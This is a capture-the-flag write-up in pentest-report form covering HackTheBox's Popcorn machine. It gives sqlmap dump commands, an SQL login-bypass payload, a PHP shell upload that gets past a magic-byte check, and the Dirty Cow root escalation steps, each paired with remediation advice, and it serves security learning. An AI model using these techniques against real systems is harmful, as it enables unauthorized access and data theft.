Popcorn CTF Writeup

Popcorn CTF Writeup

This is a writeup presented by Behind Security as part of the Road to OSCP series, focusing on the Popcorn CTF from HackTheBox.

Popcorn CTF icon

Popcorn CTF

Popcorn, while not overly complicated, contains quite a bit of content and it can be difficult for some users to locate the proper attack vector at first. This machine mainly focuses on different methods of web exploitation.

HackTheBox Logo

HackTheBox

Hack The Box gives individuals, businesses and universities the tools they need to continuously improve their cybersecurity capabilities — all in one place.

Executive Summary

This Pentest report outlines the security assessment activities conducted on the IP address 10.10.10.6. The assessment uncovered several critical and moderate vulnerabilities, posing significant security risks to the tested infrastructure.

Introduction

This report details the findings resulting from the security assessment conducted on the target with IP address 10.10.10.6. The assessment aimed to identify vulnerabilities that could be exploited by a potential adversary to gain unauthorized access and compromise the security of the infrastructure.

Objective

The objective of this security assessment was to identify and exploit vulnerabilities in the target's infrastructure to assess the effectiveness of existing security measures and provide recommendations to mitigate the identified risks.

Requirements

  • Identification of vulnerabilities in the web application hosted at IP address 10.10.10.6.
  • Exploitation of critical and moderate vulnerabilities to assess potential exposure to attacks.
  • Evaluation of the possibility of unauthorized access to systems and data.

High-Level Summary of Found Vulnerabilities

  1. Directory Bruteforcing (Moderate): Hidden directories were enumerated through a directory bruteforcing attack on the web application. Implementation of security measures such as Web Application Firewalls (WAFs) and removal of unnecessary directories is recommended.

  2. SQL Injection (High): A successful SQL injection vulnerability exploitation allowed unauthorized access to the database. The recommendation is to review and sanitize the application's code, using prepared statements and parameterized queries to prevent SQL injection attacks.

  3. Authentication Bypass (High): Authentication was bypassed through an SQL injection vulnerability, granting access as an administrator without valid credentials. Implementation of proper input validation and robust authentication mechanisms is recommended.

  4. Arbitrary File Upload (High): Exploitation of the file upload feature enabled the insertion of a malicious PHP shell, potentially allowing remote command execution. The application should rigorously validate uploaded files and bolster security controls.

  5. Root Privilege Escalation (Extreme): A critical privilege escalation vulnerability was identified in the kernel, allowing an attacker to gain root privileges. Urgent kernel update is crucial to patch this security vulnerability.

Recommendations

  1. Implement a Web Application Firewall (WAF) to detect and block malicious directory enumeration attempts.
  2. Sanitize the application's code to prevent SQL injections, using prepared statements and parameterized queries.
  3. Strengthen authentication mechanisms, including proper input validation and multi-factor authentication.
  4. Thoroughly validate uploaded files, reject unauthorized formats, and enhance upload controls.
  5. Perform an immediate kernel update to address the privilege escalation vulnerability.

Methodology

  1. Reconnaissance: The initial phase involved gathering information about open ports.

  2. Enumeration: In this phase, Behind Security conducted an in-depth enumeration of the target system, identifying exposed services, web server directories, and potential entry points for further analysis.

  3. Vulnerability Assessment: Automated scanning tools and manual techniques were employed to identify potential security vulnerabilities in the web application and server configuration.

  4. Exploitation: Vulnerabilities that posed significant risks were further exploited to verify their impact on the system’s security.

  5. Post-Exploitation: In the final phase, Behind Security attempted to escalate privileges and gain deeper access to the system, simulating real-world attack scenarios.

Color Legend

Console color legend:

Standard console text
Commands inputted by the pentester
Text that we want to highlight
{...} Abbreviated output for brevity

Risk Classification

Risk Classification from http://www.pentest-standard.org

Independent Challenge - 10.10.10.6

export IP=10.10.10.6

Service Enumeration

IP AddressPorts Open
10.10.10.6TCP: 22, 80

Web Server Enumeration

Directory Bruteforcing

Vulnerability Explanation: Behind Security was able to enumerate the directory tree of the web server further by conducting a directory bruteforcing attack, leading to the discovery of hidden directories and a potential entry point.

Vulnerability Fix: To mitigate this vulnerability, the web server should implement security measures such as Web Application Firewalls (WAFs) to detect and block excessive or malicious directory enumeration attempts. Additionally, unnecessary hidden directories should be removed, and access to sensitive directories should be restricted.

Severity: Moderate

Steps to Reproduce the Attack: Execute the command: feroxbuster -u http://10.10.10.6 -w /usr/share/wordlists/dirb/common.txt -t 10 -d 3 -o scans/ferox-common

Directory bruteforcing snippet
Main page - Torrent

SQL Injection

Vulnerability Explanation: A SQL injection vulnerability was identified at http://10.10.10.6/torrent/login.php. Behind Security successfully exploited this vulnerability using a tool named "sqlmap" allowing unauthorized access to the database. This presents a high security risk as it exposes sensitive information, including user emails and usernames.

Vulnerability Fix: To address this vulnerability, the application's code must be reviewed and sanitized to prevent SQL injection attacks. Prepared statements and parameterized queries should be used to ensure proper input validation and data protection.

Severity: High

Steps to Reproduce the Attack:

  1. Provide a single quote as the username and submit it to observe the SQL error.
  2. Execute the command: sqlmap -u http://10.10.10.6/torrent/login.php --data "username=*&password=admin" --threads=10 --technique=E --batch.
  3. Dump the users table using: sqlmap -u http://10.10.10.6/torrent/login.php --data "username=*&password=admin" --threads=10 --technique=E -T users --dump.
Testing SQL injection
Error message
sqlmap output

Authentication Bypass

Vulnerability Explanation: A SQL injection vulnerability at http://10.10.10.6/torrent/login.php enabled Behind Security to bypass authentication and log in as an admin (this attack also extends to every other user on the system) without valid credentials.

Vulnerability Fix: This vulnerability can be remediated by implementing proper input validation and authentication mechanisms. Input should be sanitized, and multi-factor authentication can be used to enhance security.

Severity: High

Steps to Reproduce the Attack:

  1. Visit http://10.10.10.6/torrent/login.png.
  2. In the username field, input: admin' or 1=1#, along with a random password.
Torrent Admin Panel

Initial Access - Arbitrary File Upload

Vulnerability Explanation: An attacker can replace a torrent icon with a malicious PHP shell, aiming to execute remote commands on the victim's machine. Successful exploitation requires bypassing the server-side "magic byte" check.

Vulnerability Fix: To address this vulnerability, the application should thoroughly validate uploaded files, ensuring they adhere to acceptable formats. Additionally, server-side validation should be augmented to prevent the bypass of security checks.

Severity: High

Steps to Reproduce the Attack:

  1. Log in as admin using the login form at http://10.10.10.6/torrent/login.php (use admin' or 1=1# as the username and any password).
  2. Access http://10.10.10.6/torrent/index.php?mode=directory.
  3. Click on the "Kali Linux" torrent that got uploaded in 2017.
  4. When a new window pop up, click to edit the icon.
  5. Behind Security used this php reverse shell to get a connection, but any php code is executable.
  6. Set up burpsuite proxy and capture the request trying to upload a legitimate png as the icon of the torrent.
  7. Replace everything but the "PNG" and the line break to php code.
  8. Edit the filename to end with .php and send it.
Editing the request in burpsuite

Post Exploitation

LPE to root

Vulnerability Explanation: The machine's kernel version, 2.6.31-14-generic-pae, dates back to 2009 and is susceptible to the "Dirty Cow" vulnerability (CVE-2016-5195). This flaw enables an attacker with an unprivileged account to exploit the kernel and gain root privileges.

Vulnerability Fix: To mitigate this critical vulnerability, the system's kernel should be updated to a version that includes the necessary security patches.

Severity: Extreme

Steps to Reproduce the Attack:

  1. Confirm the kernel version using: uname -a.
  2. Download the Dirty Cow exploit and transfer it to a writable folder (like /dev/shm) in the victim machine.
  3. Compile the exploit: gcc -pthread dirty.c -o dirty -lcrypt.
  4. Execute the exploit: ./dirty.
  5. When prompted, set a password for the new user (e.g., "firefart").
  6. Log in using the new user credentials: su firefart.
Proof of Exploitation: REDACTED root.txt
Proof of Exploitation: REDACTED /root/root.txt

Conclusion

We hope you have found our content useful and invite you to explore more of our website to discover other interesting topics we cover. From cybersecurity to programming, we strive to provide our readers with the latest and most relevant information that can help them stay informed and ahead of the curve. We are committed to providing the best user experience to you and are open to feedback and suggestions through our contact form. Thank you for choosing Behind Security, we hope to see you again soon! 

Behind Security main logo, cropped.

BEHIND SECURITY

Behind Security is an online platform dedicated to providing informative articles on cybersecurity, privacy, and programming.

Scroll to Top